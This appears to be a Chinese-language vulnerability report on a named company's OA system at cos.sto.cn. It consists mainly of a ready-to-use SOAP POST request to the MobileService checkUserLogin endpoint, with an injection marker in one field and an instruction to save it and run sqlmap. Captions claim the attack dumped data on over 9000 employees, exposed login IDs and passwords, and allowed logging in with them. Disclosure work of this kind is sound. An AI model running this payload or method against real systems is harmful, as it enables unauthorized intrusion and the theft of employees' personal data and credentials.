https://cos.sto.cn/login/Login.jsp?logintype=1


把以下内容保存为txt,用sqlmap验证:
 

POST https://cos.sto.cn/services/MobileService HTTP/1.0 Content-Type: text/xml Host: cos.sto.cn SOAPAction: "" <SOAP-ENV:Envelope xmlns:SOAP-ENV="https://schemas.xmlsoap.org/soap/envelope/" xmlns:soap="https://schemas.xmlsoap.org/wsdl/soap/" xmlns:xsd="https://www.w3.org/1999/XMLSchema" xmlns:xsi="https://www.w3.org/1999/XMLSchema-instance" xmlns:m0="https://tempuri.org/" xmlns:SOAP-ENC="https://schemas.xmlsoap.org/soap/encoding/" xmlns:urn="webservices.services.weaver.com.cn" xmlns:urn2="https://workflow.webservices.mobile.weaver"> <SOAP-ENV:Header/> <SOAP-ENV:Body> <urn:checkUserLogin> <urn:in0>1*</urn:in0> <urn:in1>1</urn:in1> <urn:in2>1</urn:in2> </urn:checkUserLogin> </SOAP-ENV:Body> </SOAP-ENV:Envelope>

stkd1.png



9000多员工信息
 

stkd2.png



可爆用户的登陆id和password,登陆一个看看:
 

stkd3.png



如果你的OA密码和件系统是一个密码,那么不好意思了,成功登陆:
 

stkd4.png


 

stkd5.png